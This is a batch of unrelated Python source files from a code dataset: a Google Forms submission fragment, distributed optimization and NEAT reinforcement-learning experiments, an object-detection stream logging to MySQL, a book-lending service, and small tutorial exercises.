[\"name\"] != \"fbzx\": continue\n freebird_submission_token = input_tag [\"value\"]\n if freebird_submission_token is None: raise Exception (\"Couldn't find fbzx\")\n print (f\"Extracted fbzx: {freebird_submission_token}\")\n\n response_body [\"emailReceipt\"] = \"\"\n response_body [\"fvv\"] = \"1\"\n response_body [\"token\"] = token_data [\"info_params\"] [\"token\"]\n response_body [\"fbzx\"] = freebird_submission_token\n response_body [\"draftResponse\"] = json.dumps ([draft, None, freebird_submission_token, None, None, None, info [0], 0])\n response_body [\"pageHistory\"] = ','.join (str (page_number) for page_number in range (section_count))\n pprint (response_body)\n\n response = requests.post (f\"https://docs.google.com/forms/d/e/{token}/formResponse\", cookies = jar, data = response_body)\n print (response)\n","repo_name":"an0ndev/Gamer_Code","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":8383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36955661467","text":"\"\"\"\nupdated\nEF21 with bidirectional compression\nexperiment for logistic regression function with non-convex regularizer\n\"\"\"\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport time\nimport sys\nimport os\nimport argparse\nfrom numpy.random import normal, uniform\nfrom sklearn.datasets import make_spd_matrix, make_sparse_spd_matrix, load_svmlight_file, dump_svmlight_file\nfrom numpy.linalg import norm\nimport itertools\nfrom scipy.special import binom\nfrom scipy.stats import ortho_group\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score, accuracy_score\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport math\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_svmlight_file\nimport datetime\nfrom IPython import display\nfrom logreg_functions_fast import *\n\n#np.random.seed(23)\ndef myrepr(x):\n return repr(round(x, 4)).replace('.',',') if isinstance(x, float) else repr(x)\n\ndef stopping_criterion(sq_norm, eps, it, Nsteps):\n #return (R_k > eps * R_0) and (it <= Nsteps)\n return (it <= Nsteps) and (sq_norm >=eps)\n\ndef top_k_matrix 
(X,k):\n output = np.zeros(X.shape)\n for i in range (X.shape[0]):\n output[i] = top_k_compressor(X[i],k)\n return output\n \ndef top_k_compressor(x, k):\n output = np.zeros(x.shape)\n x_abs = np.abs(x)\n idx = np.argpartition(x_abs, -k)[-k:] # Indices not sorted\n inds = idx[np.argsort(x_abs[idx])][::-1]\n output[inds] = x[inds]\n return output\n\ndef compute_full_grads (A, x, b, la,n_workers):\n grad_ar = np.zeros((n_workers, x.shape[0]))\n for i in range(n_workers):\n grad_ar[i] = logreg_grad(x, A[i], b[i], la).copy()\n return grad_ar\n\ndef ef21_worker_compressor(A, x, b, la, k, wg_ar, n_workers):\n grads = compute_full_grads(A, x, b, la, n_workers)\n assert(grads.shape==(n_workers,x.shape[0]))\n wg_ar_new = np.zeros((n_workers, x.shape[0]))\n delta = grads - wg_ar\n wg_ar_new = wg_ar + top_k_matrix(delta, k)\n size_value_sent = 32\n return wg_ar_new, size_value_sent, np.mean(grads, axis=0)\n\ndef ef21_master_compressor(wg, g, k):\n delta = wg - g\n g_new = g + top_k_compressor(delta, k)\n return g_new\n\ndef ef21_bc(x_0, A, b, A_0, b_0, stepsize, eps,la, k_od, k_bd, n_workers, experiment_name, project_path, dataset, Nsteps=100000):\n wg_ar = compute_full_grads(A, x_0, b, la, n_workers)\n g = np.mean(wg_ar, axis=0)\n sq_norm_ar = [np.linalg.norm(x=g, ord=2) ** 2]\n its_bits_od_ar = [0]\n its_bits_bd_ar = [0]\n it_comm_ar = [0]\n x = x_0.copy()\n it = 0\n PRINT_EVERY = 1000\n while stopping_criterion(sq_norm_ar[-1], eps, it, Nsteps):\n x = x - stepsize*g \n wg_ar, size_value_sent, grad = ef21_worker_compressor(A, x, b, la, k_od, wg_ar, n_workers)\n wg = np.mean(wg_ar, axis=0)\n g = ef21_master_compressor(wg, g, k_bd)\n sq_norm_ar.append(np.linalg.norm(x=grad, ord=2) ** 2)\n it += 1\n its_bits_od_ar.append(it*k_od*size_value_sent)\n its_bits_bd_ar.append(it*(k_od+k_bd)*size_value_sent)\n it_comm_ar.append(it)\n if it%PRINT_EVERY ==0:\n display.clear_output(wait=True)\n print(it, sq_norm_ar[-1])\n its_bits_od_ef21_bc = np.array(its_bits_od_ar)\n its_bits_bd_ef21_bc = np.array(its_bits_bd_ar)\n its_comm_ef21_bc = np.array(it_comm_ar)\n norms_ef21_bc = np.array(sq_norm_ar)\n sol_ef21_bc = x.copy()\n its_epochs_ef21_bc = its_comm_ef21_bc.copy()\n\n save_data(its_bits_od_ef21_bc, its_bits_bd_ef21_bc, its_epochs_ef21_bc, its_comm_ef21_bc, norms_ef21_bc, sol_ef21_bc, k_od, k_bd, experiment_name, project_path, dataset)\n return np.array(its_bits_od_ar), np.array(its_bits_bd_ar), np.array(it_comm_ar), np.array(sq_norm_ar), x\n\ndef save_data(its_bits_od, its_bits_bd, its_epochs, its_comm, f_grad_norms, x_solution, k_od, k_bd, experiment_name, project_path, dataset):\n experiment = '{0}_{1}_{2}'.format(experiment_name, k_od, k_bd)\n logs_path = project_path + \"logs/logs_{0}_{1}/\".format(dataset, experiment)\n \n if not os.path.exists(project_path + \"logs/\"):\n os.makedirs(project_path + \"logs/\")\n \n if not os.path.exists(logs_path):\n os.makedirs(logs_path)\n\n np.save(logs_path + 'iteration_bits_od' + '_' + experiment, np.array(its_bits_od))\n np.save(logs_path + 'iteration_bits_bd' + '_' + experiment, np.array(its_bits_bd))\n np.save(logs_path + 'iteration_epochs' + '_' + experiment, np.array(its_epochs))\n np.save(logs_path + 'iteration_comm' + '_' + experiment, np.array(its_comm))\n np.save(logs_path + 'solution' + '_' + experiment, x_solution)\n np.save(logs_path + 'norms' + '_' + experiment, np.array(f_grad_norms))\n\n\nparser = argparse.ArgumentParser(description='Run top-k algorithm')\nparser.add_argument('--max_it', action='store', dest='max_it', type=int, default=None, 
help='Maximum number of iteration')\nparser.add_argument('--k_od', action='store', dest='k_od', type=int, default=1, help='Worker-master compresion parameter')\nparser.add_argument('--k_bd', action='store', dest='k_bd', type=int, default=1, help='Master-worker compresion parameter')\nparser.add_argument('--num_workers', action='store', dest='num_workers', type=int, default=1, help='Number of workers that will be used')\nparser.add_argument('--factor', action='store', dest='factor', type=float, default=1, help='Stepsize factor')\nparser.add_argument('--tol', action='store', dest='tol', type=float, default=1e-5, help='tolerance')\nparser.add_argument('--dataset', action='store', dest='dataset', type=str, default='mushrooms',help='Dataset name for saving logs')\n\nargs = parser.parse_args()\nnsteps = args.max_it\nk_od = args.k_od\nk_bd = args.k_bd\nn_w = args.num_workers\ndataset = args.dataset\nloss_func = \"log-reg\"\nfactor = args.factor\neps = args.tol\n'''\nnsteps = 2000\nn_w = 20\ndataset = \"phishing\"\nloss_func = \"log-reg\"\nfactor = 1.0\neps = 1e-9\nk_od = 1\nk_bd = 1\n'''\nla = 0.1\n\nuser_dir = os.path.expanduser('~/')\nproject_path = os.getcwd() + \"/\"\n\ndata_path = project_path + \"data_{0}/\".format(dataset)\n\nif not os.path.exists(data_path):\n os.mkdir(data_path)\n\nX_0 = np.load(data_path + 'X.npy') #whole dateset\ny_0 = np.load(data_path + 'y.npy')\n\nn_0, d_0 = X_0.shape\n\nhess_f_0 = (1 / (4*n_0)) * (X_0.T @ X_0) + 2*la*np.eye(d_0)\nL_0 = np.max(np.linalg.eigvals(hess_f_0))\nL_0 = L_0.astype(np.float)\n\n#c = subprocess.call(f\"python3 generate_data.py --dataset mushrooms --num_starts 1 --num_workers {n_w} --loss_func log-reg --is_homogeneous 0\", shell=True)\nX = []\ny = []\nL = np.zeros(n_w)\nn = np.zeros(n_w, dtype=int)\nd = np.zeros(n_w, dtype=int)\nfor j in range(n_w):\n X.append(np.load(data_path + 'X_{0}_nw{1}_{2}.npy'.format(dataset, n_w, j)))\n y.append(np.load(data_path + 'y_{0}_nw{1}_{2}.npy'.format(dataset, n_w, j)))\n n[j], d[j] = X[j].shape\n\n currentDT = datetime.datetime.now()\n print (currentDT.strftime(\"%Y-%m-%d %H:%M:%S\"))\n print (X[j].shape)\n\n hess_f_j = (1 / (4*n[j])) * (X[j].T @ X[j]) + 2*la*np.eye(d[j])\n L[j] = np.max(np.linalg.eigvals(hess_f_j))\nL = L.astype(np.float)\n\nif not os.path.isfile(data_path + 'w_init_{0}.npy'.format(loss_func)):\n # create a new w_0\n x_0 = np.random.normal(loc=0.0, scale=1.0, size=d_0)\n np.save(data_path + 'w_init_{0}.npy'.format(loss_func), x_0)\n x_0 = np.array(np.load(data_path + 'w_init_{0}.npy'.format(loss_func)))\nelse:\n # load existing w_0\n x_0 = np.array(np.load(data_path + 'w_init_{0}.npy'.format(loss_func)))\n\nal = k_od/d_0\nt = -1 + np.sqrt(1/(1-al))\ntheta = 1 - (1 - al)*(1 + t)\nbeta = (1 - al)*(1 + 1/t)\nLt = np.sqrt (np.mean (L**2))\nstep_size_diana_tpc = (1/(L_0 + Lt*np.sqrt(beta/theta)))*factor\n\nexperiment_name = \"ef21-bc_nw-{0}_{1}x\".format(n_w, myrepr(factor))\n\nresults = ef21_bc(x_0, X, y, X_0, y_0, step_size_diana_tpc, eps,la, k_od, k_bd, n_w,experiment_name, project_path, dataset, Nsteps=nsteps)\nprint (experiment_name + f\" with k={k_od} finished in {results[0].shape[0]} iterations\" )\nits_bits_od_ef21_bc = results[0]\nits_bits_bd_ef21_bc = results[1]\nits_comm_ef21_bc = results[2]\nnorms_ef21_bc = results[3]\nsol_ef21_bc = results[4]\nits_epochs_ef21_bc = its_comm_ef21_bc.copy()\n\nsave_data(its_bits_od_ef21_bc, its_bits_bd_ef21_bc, its_epochs_ef21_bc, its_comm_ef21_bc, norms_ef21_bc, sol_ef21_bc, k_od, k_bd, experiment_name, project_path, 
dataset)\n","repo_name":"IgorSokoloff/ef21_b-w_experiements_source_code","sub_path":"Logistic regression/ef21_bc.py","file_name":"ef21_bc.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"72927548214","text":"# a² = b² + c²\n# Onde: a: representa a hipotenusa; \n# b e c: representa os catetos oposto e adjacente.\n\nfrom math import sqrt\n\ncateto_opo = int(input('O valor do cateto oposto é:'))\ncateto_adj = int(input('O valor do cateto adjacente é: '))\n\nhipotenusa = sqrt((cateto_opo**2) + (cateto_adj**2))\n\nprint('O comprimento da hipotenusa é {}'.format(hipotenusa))\n\n\n# math.hypot(cateto_opo, cateto_adj) ","repo_name":"annecaroline00/python-3---mundo-1","sub_path":"módulos/desafio017.py","file_name":"desafio017.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22575895335","text":"import cv2\nimport tensorflow as tf\nimport numpy as np\nimport os,time\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_utils\nimport json\nfrom json import encoder\nimport pymysql\n\n\n\nclass my_object_detect(object):\n def gen():\n db = pymysql.connect(host='192.168.0.177', user='root', password = '4321', db='mysql', charset='utf8')\n cur=db.cursor()\n\n cap = cv2.VideoCapture(0,cv2.CAP_V4L)\n cap.set(3, 640) # set Width\n cap.set(4, 480) # set Height\n cap.set(5, 10) # set frame\n\n\n # Init tf model\n\n MODEL_NAME = 'ssdlite_mobilenet_v2_coco_2018_05_09' #fast\n PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb' \n PATH_TO_LABELS = os.path.join('data', 'mscoco_label_map.pbtxt') \n NUM_CLASSES = 90 \n\n fileAlreadyExists = os.path.isfile(PATH_TO_CKPT) \n\n if not fileAlreadyExists:\n print('Model does not exsist !')\n exit\n\n # LOAD GRAPH\n print('Loading...')\n detection_graph = tf.Graph() \n with detection_graph.as_default(): \n od_graph_def = tf.compat.v1.GraphDef()\n with tf.io.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: \n serialized_graph = fid.read() \n od_graph_def.ParseFromString(serialized_graph) \n tf.import_graph_def(od_graph_def, name='')\n label_map = label_map_util.load_labelmap(PATH_TO_LABELS)\n categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True) \n category_index = label_map_util.create_category_index(categories)\n print('Finish Load Graph..')\n\n print(type(category_index))\n print(\"dict['Name']: \", category_index[1]['name'])\n\n t_start=time.time()\n fps=0\n\n with detection_graph.as_default():\n with tf.compat.v1.Session(graph=detection_graph) as sess:\n while True:\n success, frame = cap.read()\n image_np_expanded = np.expand_dims(frame, axis=0) \n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') \n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0') \n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0') \n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0') \n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n # print('Running detection..') \n (boxes, scores, classes, num) = sess.run( \n [detection_boxes, detection_scores, detection_classes, num_detections], \n feed_dict={image_tensor: image_np_expanded})\n\n # print('Done. 
\n                    vis_utils.visualize_boxes_and_labels_on_image_array(\n                        frame,\n                        np.squeeze(boxes),\n                        np.squeeze(classes).astype(np.int32),\n                        np.squeeze(scores),\n                        category_index,\n                        use_normalized_coordinates=True,\n                        line_thickness=8)\n\n                    for i in range(0, 10):\n                        if scores[0][i] >= 0.5:\n                            name=category_index[int(classes[0][i])]['name']\n                            print(name)\n\n\n\n                    fps = fps + 1\n                    mfps = fps / (time.time() - t_start)\n                    cv2.putText(frame, \"FPS \" + str(int(mfps)), (10,10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 2)\n                    ret,jpeg = cv2.imencode('.jpg', frame)\n                    img= jpeg.tobytes()\n\n\n                    # Parameterized query: the original string-concatenation quoting was\n                    # broken and open to SQL injection.\n                    cur.execute(\"INSERT INTO object(NAME) VALUES(%s)\", (name,))\n                    db.commit()\n                    yield (b'--frame\\r\\n'b'Content-Type: image/jpeg\\r\\n\\r\\n' + img + b'\\r\\n\\r\\n')\n\t","repo_name":"nameissh/rc_car_project","sub_path":"my_object_detect.py","file_name":"my_object_detect.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6786259850","text":"# Syntax is as follows\n\nmylist = [1,2,3]\n\nfor num in mylist:\n    print(num)\n\n# Only print even numbers\nfor num in mylist:\n    if num % 2 == 0:\n        print(num)\n\n# If you plan on not using the actual member, use _\nfor _ in mylist:\n    print(\"Not related\")\n\n\nmylist = [(1,2), (3,4), (5,6), (7,8)] # List of 4 tuples\n\n# Tuple unpacking, where you duplicate the structure of tuples and print the individual numbers\nfor a,b in mylist:\n    print(a)\n    print(b)\n\nmylist = [(1,2,3), (4,5,6), (7,8,9)]\n\nfor a,b,c in mylist:\n    print(b)\n\nd = { 'k1':1, 'k2':2, 'k3':3}\n\n# Only iterates through keys\nfor item in d:\n    print(item)\n\nfor key,value in d.items():\n    print(key)\n    print(value)\n\n# While loops\n\nx = 0\nwhile x < 5:\n    x += 1\nelse: \n    print(\"This executes when the while loop finally is not true\")\n\n# Break breaks out of closest enclosing loop\n# Continue goes to the top of the closest enclosing loop\n# Pass does nothing\n\n\nx = [1,2,3]\n\nfor item in x:\n    pass # Essentially is a placeholder to avoid a syntax error\n    # comment (Will get error without a pass)\n\nmystring = \"Sean\"\n\nfor letter in mystring:\n    if letter == 'a':\n        continue # Will skip the print if the letter is a, but will continue looping\n    print(letter)\n\nfor letter in mystring:\n    if letter == 'a':\n        break # Will completely stop loop\n    print(letter)","repo_name":"smarten-bootcamp/notes","sub_path":"python/statements/for-loop.py","file_name":"for-loop.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26156868980","text":"from datetime import datetime\nfrom typing import Optional\n\nfrom classic.app import DTO\nfrom classic.aspects import PointCut\nfrom classic.components import component\nfrom classic.messaging import Message, Publisher\nfrom pydantic import validate_arguments\n\nfrom application import interfaces, dataclasses\nfrom application.exceptions import DoesNotExists\n\njoin_points = PointCut()\njoin_point = join_points.join_point\n\n\nclass BookInfo(DTO):\n    id: Optional[int]\n    title: str\n    description: str\n    user_id: Optional[int]\n\n\n@component\nclass Book:\n    books_repo: interfaces.BooksRepo\n    publisher: Publisher\n\n    @join_point\n    @validate_arguments\n    def get_books(self):\n        books = self.books_repo.get_books()\n        if not books:\n            raise DoesNotExists\n        return books\n\n    @join_point\n    @validate_arguments\n    def get_book(self, id):\n        book = self.books_repo.get_book(id)\n        if not 
book:\n raise DoesNotExists\n return book\n\n @join_point\n @validate_arguments\n def delete_book(self, id):\n try:\n self.books_repo.get_book(id)\n except Exception:\n raise DoesNotExists\n self.books_repo.delete_book(id)\n\n @join_point\n @validate_arguments\n def add_book(self, title, description):\n book = BookInfo(title=title, description=description).create_obj(dataclasses.Book)\n self.books_repo.add_book(book)\n\n if self.publisher:\n self.publisher.plan(\n Message('test', {'event': 'add_book', 'created': datetime.now(),\n 'book_id': book.id, 'user_id': None})\n )\n\n @join_point\n @validate_arguments\n def take_book(self, id, user_id):\n try:\n book = self.books_repo.get_book(id)\n except Exception:\n raise DoesNotExists\n else:\n book_info = BookInfo(id=id, title=book.title, description=book.description, user_id=user_id)\n book_info.populate_obj(book)\n\n if self.publisher:\n self.publisher.plan(\n Message('test', {'event': 'take_book', 'created': datetime.now(),\n 'book_id': id, 'user_id': user_id})\n )\n return book\n\n @join_point\n @validate_arguments\n def return_book(self, id):\n try:\n book = self.books_repo.get_book(id)\n except Exception:\n raise DoesNotExists\n else:\n book_info = BookInfo(id=id, title=book.title, description=book.description, user_id=None)\n book_info.populate_obj(book)\n\n if self.publisher:\n self.publisher.plan(\n Message('test', {'event': 'take_book', 'created': datetime.now(),\n 'book_id': id, 'user_id': None})\n )\n\n return book\n","repo_name":"Atmostone/EvrazProject3","sub_path":"book_backend/application/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35131615509","text":"import cPickle\nimport numpy as np\nimport subprocess as sub\n\nfrom evosoro.softbot import Genotype, Phenotype\nfrom evosoro.tools.utils import make_one_shape_only, hausdorff_dist, bootstrap_ci, count_neighbors\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\n\nsns.set(color_codes=True, context=\"poster\")\nsns.set_style(\"white\", {'font.family': 'serif', 'font.serif': 'Times New Roman'})\n\ncolors = [\"grey\", \"dark pink\", \"ocean green\", \"tan\"]\nsns.set_palette(sns.xkcd_palette(colors), desat=.9)\n\n\nUSE_PICKLE = True\nGENS = [5000]\nRUNS = 20\nEXP_NAMES = [\"none\", \"stress\", \"pressure\"]\nDIR = \"/home/sam/Projects/research_code/evosoro/data_analysis/results\"\n\n\n# # TEST\n# robots = []\n# for r in range(24):\n# robots += [make_one_shape_only(np.random.randint(0, 2, (10, 10, 10)))]\n#\n# for n, r1 in enumerate(robots):\n# for r2 in robots[n + 1:]:\n# print hausdorff_dist(r1, r2)\n\n\n# if not USE_PICKLE:\n# for gen in GENS:\n# sub.call(\"mkdir {0}/Gen_{1}\".format(DIR, gen), shell=True)\n# for exp_name in EXP_NAMES:\n# for run in range(1, RUNS+1):\n# print gen, exp_name, run\n# sub.call(\"scp skriegma@bluemoon-user1.uvm.edu:/users/s/k/skriegma/scratch/\"\n# \"alpha_{2}_A/run_{3}/pickledPops/Gen_{1}.pickle \"\n# \" {0}/Gen_{1}/{2}_Run_{3}.pickle\".format(DIR, gen, exp_name, run),\n# shell=True)\n\n\nMyGenotype = Genotype\nMyPhenotype = Phenotype\n\n\nif not USE_PICKLE:\n\n generation = []\n hausdorff = []\n group = []\n\n for gen in GENS:\n\n for exp_idx, exp_name in enumerate(EXP_NAMES):\n\n run_champs = []\n\n for run in range(1, RUNS+1):\n try:\n pickle = 
'{0}/Gen_{1}/{2}_Run_{3}.pickle'.format(DIR, gen, exp_name, run)\n with open(pickle, 'rb') as handle:\n [optimizer, random_state, numpy_random_state] = cPickle.load(handle)\n\n pop = optimizer.pop\n\n best_ind = None\n for ind in pop:\n if ind.fitness == pop.best_fit_so_far:\n best_ind = ind\n\n run_champs += [best_ind]\n except IOError:\n pass\n\n distances = []\n\n for n, ind1 in enumerate(run_champs):\n for name, details in ind1.genotype.to_phenotype_mapping.items():\n if name == \"material_present\":\n g1 = details[\"state\"]\n\n g1_90 = np.rot90(g1, k=1, axes=(0, 1))\n g1_180 = np.rot90(g1, k=2, axes=(0, 1))\n g1_270 = np.rot90(g1, k=3, axes=(0, 1))\n rotations_of_ind1 = [g1, g1_90, g1_180, g1_270]\n rotations_of_ind1 += [np.rot90(x, k=1, axes=(0, 2)) for x in rotations_of_ind1]\n\n for ind2 in run_champs[n+1:]:\n for name, details in ind2.genotype.to_phenotype_mapping.items():\n if name == \"material_present\":\n g2 = details[\"state\"]\n\n min_dist = np.inf\n for this_rot in rotations_of_ind1:\n d = hausdorff_dist(this_rot, g2)\n if d < min_dist:\n min_dist = d\n\n distances += [min_dist]\n\n # append to plot data\n hausdorff += distances\n group += [exp_idx]*len(distances)\n generation += [gen] * len(distances)\n\n # # statistics\n # l, u = bootstrap_ci(distances, np.median, n=1000, ci=95)\n # print exp_name, (l, u)\n\n # PLOTTING\n generation = np.array(generation)\n group = np.array(group)\n hausdorff = np.array(hausdorff)\n data = np.array([generation, group, hausdorff])\n\n df = pd.DataFrame(data=data.T, columns=[\"Gen\", \"Group\", \"Distance\"])\n\n # save dataframe\n with open('{0}/Run_Champ_Hausdorff.pickle'.format(DIR), 'wb') as handle:\n cPickle.dump(df, handle, protocol=cPickle.HIGHEST_PROTOCOL)\n\nelse:\n # load original fitness\n with open('{0}/Run_Champ_Hausdorff.pickle'.format(DIR), 'rb') as handle:\n df = cPickle.load(handle)\n\ndf = df[df['Gen'] == 5000]\n\nfig, ax = plt.subplots(1, 1, figsize=(4.05, 4))\n\ng = sns.barplot(x=\"Group\", y=\"Distance\", data=df, ax=ax, capsize=0.1, errwidth=2, ci=95, alpha=0.75)\n\n# # statistical annotation\n# text = r\"${\\ast}{\\ast}{\\ast}$\"\n# x1, x2 = 1, 2\n# y, h, col = 4.2, 0.15, 'k'\n# plt.plot([x1, x1, x2, x2], [y, y+h, y+h, y], lw=1.5, c=col)\n# plt.text((x1+x2)*.5, y+h, text, ha='center', va='bottom', color=col, fontsize=14)\n\nax.set_ylim([0, 5])\nax.set_yticks(range(6))\nfor tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(12)\nax.set_ylabel(\"$\\mathregular{d_H}$\", fontsize=18, fontweight=\"bold\")\nax.set_xticklabels([\"None\", \"Stress\", \"Press\"], fontsize=14, fontweight=\"bold\")\nax.set_xlabel(\"\") # \"At generation {}\".format(GEN))\nax.set_title(\"Geometric diversity\", fontsize=14)\n# ax.legend_.remove()\n# ax.legend([matplotlib.patches.Patch(color=sns.color_palette()[i]) for i in range(3)],\n# ['None', 'Stress', 'Pressure'], loc=1)\n\n\nc = sns.color_palette()[3]\nplt.text(ax.get_xlim()[0]+0.07, ax.get_ylim()[1]*(1-0.0094/0.4), \"B\", ha='left', va='top', color=\"k\",\n fontsize=25, fontname=\"Arial\", bbox=dict(facecolor=c, edgecolor=c, alpha=0.5))\n\n# sns.despine()\nplt.tight_layout()\nplt.savefig(\"plots/Hausdorff.pdf\", bbox_inches='tight')\n\n","repo_name":"skriegman/2018-gecco","sub_path":"evosoro/data_analysis/hausdorff.py","file_name":"hausdorff.py","file_ext":"py","file_size_in_byte":5635,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"2999584511","text":"class ShortInputException(Exception):\n '''A user-defined 
exception class.'''\n def __init__(self, length, atleast):\n Exception.__init__(self)\n self.length = length\n self.atleast = atleast\n\ntry:\n text = input('Enter something: ')\n if len(text) < 3:\n raise ShortInputException(len(text), 3)\n \nexcept ShortInputException as my_ex:\n print(my_ex.length, my_ex.atleast)\n\nelse:\n print('No exception was raised.')\n\n\nprint(\"End of app\")\n\n\"\"\"\n\n\nOUTPUT 1:\n_________________________________________\nEnter something: t\n1 , 3\nEnd of app\n\n\nOUTPUT 2:\n_________________________________________\nEnter something: te\n2 , 3\nEnd of app\n\n\nOUTPUT 3:\n_________________________________________\nEnter something: test\nNo exception was raised.\nEnd of app\n\n\n\"\"\"\n","repo_name":"shadibdair/Python","sub_path":"Day 11 - 02.01.2019/09_except with as.py","file_name":"09_except with as.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41844723020","text":"\"\"\"\nEvolve a control/reward estimation network for the Moon Lander example from OpenAI Gym.\nLunarLander-v2 environment (https://gym.openai.com/envs/LunarLander-v2).\nSample run here: https://gym.openai.com/evaluations/eval_FbKq5MxAS9GlvB7W6ioJkg\n\"\"\"\nimport multiprocessing\nimport os\nimport pickle\nimport random\nimport sys\nimport time\nfrom collections import namedtuple\n\nimport neat\nimport gym.wrappers\nimport numpy as np\n\nimport util.argparsing as argutils\nimport util.reporters as reporters\nimport gymex.visualize as visualize\nfrom gymex.config import make_config\n\nNUM_CORES = os.cpu_count()\nif hasattr(os, \"sched_getaffinity\"):\n # This function is only available on certain platforms. When running with Slurm, it can tell us the true number of\n # cores we have access to.\n NUM_CORES = len(os.sched_getaffinity(0))\n\n\ndef take_step(env, observation, networks, random_action_prob=0.0):\n if not isinstance(networks, (tuple, list)):\n networks = [networks]\n assert len(networks) > 0 and networks[0] is not None\n\n # Run the networks.\n num_outputs = len(networks[0].output_nodes)\n all_actions = np.zeros((len(networks), num_outputs))\n for i, n in enumerate(networks):\n all_actions[i] = n.activate(observation)\n\n # Choose an action.\n if random.random() < random_action_prob:\n # Take a random action with some probability.\n action = env.action_space.sample()\n else:\n if isinstance(env.action_space, gym.spaces.Discrete):\n # Make a choice from a discrete set of actions. If multiple networks, take the action with the highest\n # total value.\n # TODO: Maybe vote instead of summing reward estimates?\n action = np.argmax(all_actions.sum(axis=0))\n elif isinstance(env.action_space, gym.spaces.Box):\n # Output a continuous action. 
If multiple networks, average them.\n action = all_actions.mean(axis=0)\n else:\n raise RuntimeError(f\"Unsupported action space: {env.action_space}\")\n\n observation, reward, terminated, truncated, info = env.step(action)\n return all_actions, action, observation, reward, (terminated or truncated), info\n\n\ndef compute_reward_prediction_error(args):\n genome, net, episodes, reward_range, use_reward_discount = args\n\n if use_reward_discount:\n m = int(round(np.log(0.01) / np.log(genome.discount)))\n discount_function = [genome.discount ** (m - i) for i in range(m + 1)]\n else:\n m = None\n discount_function = None\n\n reward_error = []\n for ep in episodes:\n # Compute normalized discounted reward.\n if use_reward_discount:\n rewards = np.convolve(ep.rewards, discount_function)[m:]\n else:\n rewards = ep.rewards.copy()\n if reward_range:\n # NOTE: This is done knowing that we are usually using networks whose outputs are clamped to [-1, 1].\n # So we need targets in the same range.\n min_reward, max_reward = reward_range\n rewards = 2 * (rewards - min_reward) / (max_reward - min_reward) - 1.0\n rewards = np.clip(rewards, -1.0, 1.0)\n\n for obs, act, dr in zip(ep.observations, ep.actions, rewards):\n output = net.activate(obs)\n reward_error.append(float((output[act] - dr) ** 2)) # squared error from discounted reward value???\n # TODO: This is extremely vulnerable to strange minima. We need to do more than simply predict the reward of\n # TODO: our own policy.\n\n return np.mean(reward_error)\n\n\nEpisode = namedtuple(\"Episode\", [\"observations\", \"actions\", \"rewards\"])\n\n\ndef run_sim_episodes(args):\n net, gym_config = args\n env = gym.make(gym_config.env_id)\n episodes = []\n for _ in range(gym_config.num_fitness_episodes):\n observation, _ = env.reset()\n observations = []\n actions = []\n rewards = []\n while True:\n _, action, observation, reward, done, _ = take_step(env, observation, net,\n gym_config.random_action_prob)\n observations.append(observation)\n actions.append(action)\n rewards.append(reward)\n\n if done:\n break\n\n observations = np.array(observations)\n actions = np.array(actions)\n rewards = np.array(rewards)\n episodes.append(Episode(observations, actions, rewards))\n\n return episodes\n\n\nclass PooledErrorCompute(object):\n\n def __init__(self, gym_config, pool=None):\n self.gym_config = gym_config\n self.pool = pool\n self.generation = 0\n self.test_episodes = []\n\n def simulate(self, nets, gym_config):\n msg = f\"Simulating {len(nets)} nets in {gym_config.num_fitness_episodes} episodes\"\n jobs = [(net, gym_config) for _, net in nets]\n if self.pool:\n print(msg + f\", in parallel...\", flush=True)\n results = self.pool.map(run_sim_episodes, jobs)\n else:\n print(msg + \", serially...\", flush=True)\n results = map(run_sim_episodes, jobs)\n\n for i, episodes in enumerate(results):\n genome = nets[i][0]\n scores = [ep.rewards.sum() for ep in episodes]\n genome.fitness = sum(scores) / gym_config.num_fitness_episodes\n self.test_episodes.extend(episodes)\n\n def evaluate_genomes(self, genomes, config):\n self.generation += 1\n config.update_schedules(self.generation)\n\n t0 = time.time()\n nets = [(g, neat.nn.FeedForwardNetwork.create(g, config)) for gid, g in genomes]\n print(f\"Time to create {len(nets)} networks: {time.time() - t0:.2f}s\")\n t0 = time.time()\n\n # Periodically generate a new set of episodes for comparison. 
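(Old episodes are kept for roughly two\n        # generations; see num_to_keep below.) 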
